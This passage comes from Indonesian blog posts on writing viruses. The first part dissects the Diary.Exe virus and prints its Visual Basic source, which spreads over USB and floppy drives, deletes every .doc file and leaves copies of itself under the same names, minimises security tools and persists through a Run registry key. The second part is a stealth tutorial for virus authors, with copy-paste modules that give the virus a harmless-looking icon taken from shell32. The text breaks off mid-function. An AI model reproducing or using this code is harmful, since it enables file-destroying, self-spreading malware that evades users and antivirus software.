| Create file Explorer.Exe di folder | |Create file di folder %systemroot&\System32|
| %ProgramFiles%\Common Files\System |

|<-------------------------------------------|

|Infeksi key-key di Registry, Hidden file, Disableregistrytools, Dll|

|

|Periksa apakah folder %Program Files%\InstallShield Installation Information ada?|

| tidak ada
|------------------------------------------------>|
ada| |
| |Create folder %Program Files%\InstallShield Installation Information|
| |
|<------------------------------------------------|

|Create file Rsvdb.Exe ke %Program Files%\InstallShield Installation Information|

|

|Create file RegsvcChk.Exe ke folder %SystemRoot%|

|

|Create file Spoolsw.Exe ke folder %userprofile%\Application Data|

|

|Execute Regsvcchk.Exe|

|

|Execute Spoolsw.Exe|

|

|Deteksi dan hapus Virus Kangen All Varian di Komputer|

|

|Deteksi dan Infeksi semua File MS-Word (*.Doc) di Komputer|

|

|END EXECUTION|

>Semua file MS-Word yang terdeteksi akan diambil namanya, lalu sang virus akan meng-
gandakan dirinya menggunakan nama file tsb. Lalu bagaimana dengan file .Doc tersebut?
File tsb akan dihapus/didelete. Algoritma jahat inilah yang merugikan banyak user
komputer karena semua file .Docnya telah hilang.
>Berikut cuplikan dari Source Code Diary.Exe :

----------------------------Cut Here---------------------------------
Private Sub cek(path As String)
On Error Resume Next
If Right(path, 1) <> "\" Then
path = path + "\"
End If
Set fol = fso.getfolder(path)
Set fil = fol.Files
Set subfol = fol.subfolders
If fso.fileexists(path + "Diary.exe") = True Then
GoTo a
Else
Call copi("Diary.exe", path)
End If
a: For Each fil2 In fil
If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC" Then
desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
Call copi(desk1 + ".exe", path)
Kill fil2.path
End If
Next
For Each subfols In subfol
cek (subfols.path)
Next
End Sub

----------------------------Cut Here---------------------------------

----------------------------Cut Here---------------------------------

Private Sub Timer1_Timer()
On Error Resume Next
Call GetActiveWindowName
tutup
If InStr(tampung, "A:") <> 0 Then
cek ("A:")
End If
cari
If i > 0 Then
For j = 0 To i - 1
If desk(j) <> "" Then
If InStr(tampung, desk2(j)) <> 0 Then
cek (desk2(j))
End If
End If
Next
End If
End Sub

----------------------------Cut Here---------------------------------

>Algoritma tersebut adalah bagaimana Virus bisa mendeteksi dikala user sedang membuka
Removeable Drive (Disket, USB, Dll) dengan mengambil Window Captionnya. Hal ini tidak
akan berlaku bila user membukanya di lingkungan DOS (Command Prompt). Dengan cara itu pula
virus bisa menggandakan dirinya dan menyebarkannya lewat Floopy Disk atau USB Drive.
>Virus juga akan me-Minimize window-window yang mempunyai string "Registry Editor",
"Application Data", "WINDOWS", "WINNT", "Program Files", "Command Prompt, "DOS", "Task",
"Process", "System", "Hijack", dan "Kill". Berikut adalah code dari algortima tsb :

----------------------------Cut Here---------------------------------

Private Sub tutup()
If InStr(tampung, "Registry Editor") <> 0 Or InStr(tampung, "Application Data") <> 0 Or InStr(tampung, "WINDOWS") <> 0_
Or InStr(tampung, "WINNT") <> 0 Or InStr(tampung, "Program Files") <> 0 Or InStr(tampung, "Command Prompt") <> 0_
Or InStr(tampung, "DOS") <> 0 Or InStr(tampung, "Task") <> 0 Or InStr(tampung, "Process") <> 0 Or InStr(tampung, "System") <> 0_
Or InStr(tampung, "Hijack") <> 0 Or InStr(tampung, "Kill") <> 0 Then
CloseWindow GetForegroundWindow
End If
End Sub

----------------------------Cut Here---------------------------------

>Sebagai Virus pasti Diary.Exe juga memerlukan suatu method Autorun saat komputer Boot. Virus ini
menggunakan key di HKLM\Software\Microsoft\Windows\CurrentVersion\Run dengan value NvsSchd dan berisi
data %Program Files%\Common Files\System\Explorer.exe.
>Karena ketidaksempurnaan dalam penulisan program, maka virus ini hanya dapat berjalan di sistem operasi
Windows XP, 2000 atau 2003. Virus ini berukuran sekitar 60 Kb dan yang telah dikompresi berukuran 20 Kb
dengan menggunakan kompresi UPX.

$API Functions List...
>GetSystemDirectory
GetWindowText
GetDesktopWindow
GetTopWindow
CloseWindow
GetWindowText
GetForegroundWindow
FindWindow
SendMessage

$Advantages N Disadvantages...
>Virus berukuran cukup kecil
>Selain mem-blok akses, juga me-minimize window-window
>Virus tidak dapat berjalan di Windows 9x dan Me
>Teknik search file masih menggunakan FSO dan WSH
>Menghapus file korban

$End...
>Diary.Exe dapat dikatakan salah satu virus lokal berbahaya karena menghapus file-file MS-Word di Komputer yang
terinfeksi. Penyebaran virus ini masih rendah, Media penyebarannya melalui Disket dan USB Drive. Teknik searching
file .Doc menggunakan teknik file scripting object. Dan implementasi Key Registry menggunakan teknik Windows Scripting.
Demikian artikel sederhana ini, kurang atau lebihnya saya mohon maaf....

$Greetz...
>Myztx @ Myztx Soft. House.
>All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack n the others.
>Spyro, Vaganci, Yanto, n All my Friends at 01 [2005] n 07 [2004].

Implementasi Teknik Stealth Pada Virus

2007-06-28T22:56:00.002+07:00

- 27-2-06 -

$> A little Words...
Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).

$> Start...
Mungkin sebagian (Atau seluruhnya) Vx3r (Pembuat Virus) pasti menemukan suatu permasalahan dalam
membuat Virusnya agar susah dihapus atau meminimalisir pendeteksian oleh User ataupun Anti Virus.
Bagaimana sih cara-cara Vx3r itu menyembunyikan Virusnya di kOmputer korban? Ada beberapa cara yang
klasik dan sangat sering dilakukan, Seperti:

1. Merubah nama File Virus menjadi (mirip) File system Windows, contoh : RunDll32.exe, Winsys32.exe,dll
2. Menempatkan File Virus di Folder Hidden atau di Folder System Windows.
3. Menghalangi Akses ke Task Manager maupun Tool-tool yang dapat menampilkan proses yang sedang
berlangsung. Hal ini lumrah karena virus ingin eksistensinya dipertahankan.
4. Menggunakan nama file yang random atau acak.
5. Menggunakan Ikon yang umum seperti MS-Word, Folder, Setup program, dll.
6. Memblok fasilitas Search.
7. Dan lainnya.

Lalu apa saja kelemahannya? Untuk penggunaan Ikon yang umum hal ini sangat fatal, karena User dapat
membedakan antara ikon Default File *.Exe dengan ikon yang dipakai oleh Virus. Sebagai contoh apabila
si Virus memakai Ikon MS-Word maka akan terjadi suatu kejanggalan, "Ikonnya Word kok ekstensinya Exe?".
Contoh lagi kasus penggunaan nama file random atau acak. Pada hal ini diperlukan suatu penyimpanan
dari nama file acak itu, karena pada Trigger Virus jalan dia akan mencari file yang dimaksud. Pemyimpanan
nya pun berupa file ataupun key di registry. Kedua teknik penyimpanan tersebut sama baiknya apabila dilengkapi
oleh teknik Enkripsi. Pada suatu Virus yang pernah saya temukan dan analisa, Kangen.E telah menggunakan
nama acak dan penyimpanan di suatu file *.sys. Dan file tersebut dibiarkan apa adanya tanpa perlindungan
apapun terhadap isinya. Hal ini memudahkan dalam melacak nama trigger virus tsb.
Sebenarnya langkah apa yang harus diambil agar virus kita tak mudah terlacak oleh User? Menurut pandangan
saya ada beberapa poin yang sangat penting:

1. Lakukan teknik penggantian Ikon secara langsung (Ekstrak dan ganti), bukan mengandalkan ikon default.
2. Penggantian Filetime maupun FileDate dan ukuran pada file Virus agar tidak mudah ditemukan dengan Search.
3. Gunakan API-Hook dalam melacak tool Proses Viewer, jangan mengandalkan windows Caption karena sudah banyak
tool yang tidak memakai window caption lagi.
4. Jika memungkinkan jangan me-launch instan virus dengan cara "shell", karena hal ini dapat berakibat
Proses Virus menjadi Parent and Child. Bila sang parent mati maka si child pun akan ikut mati.
5. Selalu gunakan instan virus lain untuk saling melacak keberadaan virus (Anti-Kill process) sehingga virus
memungkinkan untuk tetap eksis.

$> How to...?
Saya menggunakan Bahasa Pemograman Visual Basic 6.0 dalam mencoba teknik
stealth (yang menurut saya) agak baik Serta beberapa referensi Source Code maupun artikel dari Internet.
Teknik ini juga saya coba pada Virus Diary.Exe (V 1.3-1.5) dengan beberapa perubahan.

1. Penggantian ikon
Jika anda pernah menemukan suatu software pengekstrak atau pengganti ikon (bahkan keduanya) suatu file, maka
kurang lebih hal ini bisa juga diimplementasikan di Virus :D. COntoh algoritmanya :

START EXECUTION

|

Copy myself.exe to destination path

|

Search file yang akan diekstrak ikonnya

|

Ekstrak ikonnya, save to destination path

|

Change myself.exe dengan file ikon (*.Ico)
yang sudah di ekstrak

|

Hapus File ikon apabila sudah tidak digunakan

|

END EXECUTION

Saya menggunakan file Shell32.Dll sebagai file yang akan diekstrak Ikonnya, dalam hal ini saya akan memilih
ikon Default file *.exe (yang berwarna kotak putih-biru :P). Kira-kira begini source codenya :

(Diperlukan Objek PictureBox dalam Form)

------------------------------------Cut Here & Start Copy-Paste from Here------------------------------------
Sub cariikon(pathcari As String, pathekstrak As String, jenisikon As String, pic2 As PictureBox)

Dim poin As Long
poin = 1
Dim i As Long
Dim buf(1000) As Double
Dim jum As Integer
jum = 0
Dim jikon As Long
jikon = 0
Dim init As String
init = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
Dim strbaca As String
strbaca = Space(2238)
Dim fildat As String
Dim new_dic As String
Dim rs As String
rs = Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
Dim buff As Double
buff = 1024 ^ 2

Open pathcari For Binary As #1
If LOF(1) > buff Then
fildat = Space(buff)
Else
fildat = Space(LOF(1))
End If
balik:
If poin > LOF(1) Then
GoTo tulis
End If

Get #1, poin, fildat

i = 1
carilagi:
DoEvents

i = InStr(i + 1, fildat, "(" & rs)
If i > 0 Then
'lst.Add "#" & lst.Count & "#", i + poin - 1
buf(jum) = i + poin - 1
jum = jum + 1
End If

If i + Len(rs) > buff Or i = 0 Then
poin = poin + buff - Len("(" & rs) - 1
GoTo balik
Else
GoTo carilagi
End If

tulis:
Close
Open pathcari For Binary As #1
For poin = 0 To jum - 1
DoEvents
If Right(pathekstrak, 1) <> "\" Then
pathekstrak = pathekstrak & "\"
End If
If poin <> jenisikon Then GoTo lsg
Open pathekstrak & "Ikon.ico" For Output As #2: Close #2
Open pathekstrak & "Ikon.ico" For Binary As #2

'i = lst.Item("#" & poin & "#")
i = buf(poin)
Get #1, i, strbaca
Put #2, 1, init & strbaca & Chr$(255)
Close #2
If ikon(pathekstrak & "Ikon.ico", pic2) = 0 Then
Kill pathekstrak & "Ikon.ico"
End If
DoEvents
lsg: Next poin
Close #1
Close
End Sub

sub ikon(path As String, pic As PictureBox)
On Error GoTo ero
pic.Picture = LoadPicture(path)
ikon = 1
Exit Function
ero:
ikon = 0
Exit Function
End Function
------------------------------------Cut Here & End Copy-Paste from Here------------------------------------

Prosedur cariikon akan mencari file yang akan diekstrak ikonnya berdasarkan index ikon tersebut.
Ikon yang akan dihasilkan masih berukuran 16X16, tetapi hal itu sudah cukup untuk mengelabui User.
Perlu diingat bahwa index ikon file *.Exe dalam shell32.Dll untuk tiap versi Windows adalah berbeda.
Terutama untuk Windows 9x dan Windows 2k/2003/XP/NT.

Lalu bagaimana kita menukar atau change ikon virus kita dengan file ikon yang sudah diekstrak tsb?

(Referensi Source Code dari Internet, Author :Naveed, neenojee@hotmail.com)

1st. Module:
------------------------------------Cut Here & Start Copy-Paste from Here------------------------------------
Option Explicit
Type DIB_HEADER
Size As Long
Width As Long
Height As Long
Planes As Integer
Bitcount As Integer
Reserved As Long
ImageSize As Long
End Type

Type ICON_DIR_ENTRY
bWidth As Byte
bHeight As Byte
bColorCount As Byte
bReserved As Byte
wPlanes As Integer
wBitCount As Integer
dwBytesInRes As Long
dwImageOffset As Long
End Type

Type ICON_DIR
Reserved As Integer
Type As Integer
Count As Integer
End Type

Type DIB_BITS
Bits() As Byte
End Type

Public Enum Errors
FILE_CREATE_FAILED = 1000
FILE_READ_FAILED
INVALID_PE_SIGNATURE
INVALID_ICO
NO_RESOURCE_TREE
NO_ICON_BRANCH
CANT_HACK_HEADERS
End Enum
Public Function ReplaceIcons(Source As String, Dest As String) As Long

Dim IcoDir As ICON_DIR
Dim IcoDirEntry As ICON_DIR_ENTRY
Dim tBits As DIB_BITS
Dim Icons() As IconDescriptor
Dim lngRet As Long
Dim BytesRead As Long
Dim hSource As Long
Dim hDest As Long
Dim ResTree As Long

hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0)
If hSource >= 0 Then
If Valid_ICO(hSource) Then
SetFilePointer hSource, 0, 0, 0
ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0&
ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0&
SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0
ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte
ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0&
CloseHandle hSource
hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0, ByVal 0)
If hDest >= 0 Then
If Valid_PE(hDest) Then
ResTree = GetResTreeOffset(hDest)
If ResTree > 308 Then ' Sanity check
lngRet = GetIconOffsets(hDest, ResTree, Icons)
SetFilePointer hDest, Icons(1).Offset, 0, 0
WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0&
Else
CloseHandle hDest
End If
Else
CloseHandle hDest
End If
CloseHandle hDest
Else
End If
Else
CloseHandle hSource
End If
Else
End If
ReplaceIcons = 0
Exit Function
End Function
Public Function Valid_ICO(hfile As Long) As Boolean
Dim tDir As ICON_DIR
Dim BytesRead As Long
If (hfile > 0) Then
ReadFile hfile, tDir, Len(tDir), BytesRead, ByVal 0&
If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then
Valid_ICO = True
Else
Valid_ICO = False
End If
Else
Valid_ICO = False
End If
End Function
------------------------------------Cut Here & End Copy-Paste from Here------------------------------------

2nd. Module
------------------------------------Cut Here & Start Copy-Paste from Here------------------------------------
Option Explicit
Public Type IMAGE_DOS_HEADER
Magic As Integer
cblp As Integer
cp As Integer
crlc As Integer
cparhdr As Integer
minalloc As Integer
maxalloc As Integer
ss As Integer
sp As Integer
csum As Integer
ip As Integer
cs As Integer
lfarlc As Integer
ovno As Integer
res(3) As Integer
oemid As Integer
oeminfo As Integer
res2(9) As Integer
lfanew As Long
End Type

Public Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOtionalHeader As Integer
Characteristics As Integer
End Type

Public Type IMAGE_DATA_DIRECTORY
DataRVA As Long
DataSize As Long
End Type

Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkVer As Byte
MinorLinkVer As Byte
CodeSize As Long
InitDataSize As Long
unInitDataSize As Long
EntryPoint As Long
CodeBase As Long
DataBase As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOSVer As Integer
MinorOSVer As Integer
MajorImageVer As Integer
MinorImageVer As Integer
MajorSSVer As Integer
MinorSSVer As Integer
Win32Ver As Long
ImageSize As Long
HeaderSize As Long
Checksum As Long
Subsystem As Integer
DLLChars As Integer
StackRes As Long
StackCommit As Long
HeapReserve As Long
HeapCommit As Long
LoaderFlags As Long
RVAsAndSizes As Long
DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type

Public Type IMAGE_SECTION_HEADER
SectionName(7) As Byte
Address As Long
VirtualAddress As Long
SizeOfData As Long
PData As Long
PReloc As Long
PLineNums As Long
RelocCount As Integer
LineCount As Integer
Characteristics As Long
End Type

Type IMAGE_RESOURCE_DIR
Characteristics As Long
TimeStamp As Long
MajorVersion As Integer
MinorVersion As Integer
NamedEntries As Integer
IDEntries As Integer
End Type

Type RESOURCE_DIR_ENTRY
Name As Long
Offset As Long
End Type

Type RESOURCE_DATA_ENTRY
Offset As Long
Size As Long
CodePage As Long
Reserved As Long
End Type

Public Type IconDescriptor
ID As Long
Offset As Long
Size As Long
End Type

Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private SectionAlignment As Long
Private FileAlignment As Long
Private ResSectionRVA As Long
Private ResSectionOffset As Long
Public Function Valid_PE(hfile As Long) As Boolean

Dim Buffer(12) As Byte
Dim lngBytesRead As Long
Dim tDosHeader As IMAGE_DOS_HEADER

If (hfile > 0) Then
ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0&
CopyMemory Buffer(0), tDosHeader.Magic, 2
If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then
SetFilePointer hfile, tDosHeader.lfanew, 0, 0
ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And (Buffer(3) = 0) Then
Valid_PE = True
Exit Function
End If
End If
End If

Valid_PE = False

End Function
Public Function GetResTreeOffset(hfile As Long) As Long
On Error GoTo ErrHandler:

Dim tDos As IMAGE_DOS_HEADER
Dim tFile As IMAGE_FILE_HEADER
Dim tOptional As IMAGE_OPTIONAL_HEADER
Dim tSections() As IMAGE_SECTION_HEADER
Dim BytesRead As Long
Dim intC As Integer
Dim TreeFound As Boolean

TreeFound = False
If (hfile > 0) Then
SetFilePointer hfile, 0, 0, 0
' Get the offset of the Image File Header
ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0&
SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
' Get the Image File Header and the Image Optional Header
ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0&
ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
' Get section headers
ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER
ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections, BytesRead, ByVal 0&
' Make sure there is a resource tree in this file
If (tOptional.DataEntries(2).DataSize) Then
' Save section alignment and file alignment of image
SectionAlignment = tOptional.SectionAlignment
FileAlignment = tOptional.FileAlignment
' Determine which section contains the resource tree
For intC = 0 To UBound(tSections)
If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _
And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) > tOptional.DataEntries(2).DataRVA) Then
TreeFound = True
' Save RVA and offset of resource section for future calculations
ResSectionRVA = tSections(intC).VirtualAddress
ResSectionOffset = tSections(intC).PData
' Calculate the physical file offset of the resouce tree
GetResTreeOffset = tSections(intC).PData + (tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress)
Exit For
End If
Next intC
If Not TreeFound Then
GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1
End If
Exit Function

ErrHandler:

End Function
Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As IconDescriptor) As Long
On Error GoTo ErrHandler:

Dim Root As IMAGE_RESOURCE_DIR ' Root node of resource tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' 1st level of directory entries
Dim L2Root() As IMAGE_RESOURCE_DIR ' Level 2 resource directories
Dim L2Entries() As RESOURCE_DIR_ENTRY ' 2nd level of directory entries
Dim L3Root() As IMAGE_RESOURCE_DIR ' Level 3 resource directories
Dim L3Entries() As RESOURCE_DIR_ENTRY ' 3rd level of directory entries
Dim DataEntries() As RESOURCE_DATA_ENTRY ' Resource data entries
Dim DIB As DIB_HEADER ' Descriptor for icon images
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim Cursor As Long ' Temp val for setting file pointer
Dim BytesRead As Long ' For ReadFile()
Dim Count As Integer ' Number of icons found

If (hfile > 0) Then
Count = 0
SetFilePointer hfile, ByVal TreeOffset, 0, 0
' Get the root node and begin navigating the resource tree
ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0
ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
' Get first level child nodes
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0
ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
If L1Entries(iLvl1).Name = 3 Then
' Jump to level 2 and get directory
' Strip high-order byte from offset
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As RESOURCE_DIR_ENTRY
For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
' Read second level child nodes
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
' Jump to level 3 and get directory
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DATA_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure
SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0
ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Convert RVA of IconDir structure to file offset and store
Count = Count + 1
ReDim Preserve Icons(Count) As IconDescriptor
Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
' Store ID of icon resource
Icons(Count).ID = L2Entries(iLvl2).Name
' Store Size of icon resource
SetFilePointer hfile, Icons(Count).Offset, 0, 0
ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0&
Icons(Count).Size = DIB.ImageSize + 40
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
Count = 0
End If

' Return the number of icons found
GetIconOffsets = Count
Exit Function

ErrHandler:

End Function
Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _
DIBAttrib As ICON_DIR_ENTRY) As Boolean
On Error GoTo ErrHandler:

Dim Cursor As Long ' File pointer position
Dim Root As IMAGE_RESOURCE_DIR ' Root node of res tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' First-level child nodes
Dim L2Root() As IMAGE_RESOURCE_DIR ' Second-level root nodes
Dim L2Entries() As RESOURCE_DIR_ENTRY ' Second-level child nodes
Dim L3Root() As IMAGE_RESOURCE_DIR ' Third-level root nodes
Dim L3Entries() As RESOURCE_DIR_ENTRY ' Third-level child nodes
Dim DataEntries() As RESOURCE_DATA_ENTRY ' IMAGE_RESOURCE_DATA_ENTRY structs
Dim IcoDir As ICON_DIR ' IconDirectory in EXE
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim intC As Integer ' Loop Counter (general)
Dim BytesRead As Long ' Returned by Read/WriteFile API's

If (hfile >= 0) Then
' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures)
DIBOffset = Offset_to_RVA(DIBOffset)
SetFilePointer hfile, ByVal ResTree, 0, 0
ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
' Loop through first-level child nodes and find RT_GROUP_ICON branch
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0
ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
If L1Entries(iLvl1).Name = &HE Then
' RT_GROUP_ICON branch found
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read second-level directory
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to RESOURCE_DATA_ENTRY
CopyMemory Cursor, L3Entries(iLvl3).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY
ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Jump to and read ICON_DIR structure
Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0&
For intC = 1 To IcoDir.Count
WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0&
SetFilePointer hfile, 2, 0, 1
Next intC
Next iLvl3
Next iLvl2
ElseIf L1Entries(iLvl1).Name = 3 Then
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, ByVal Cursor, 0, 0
' Read second-level directory
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
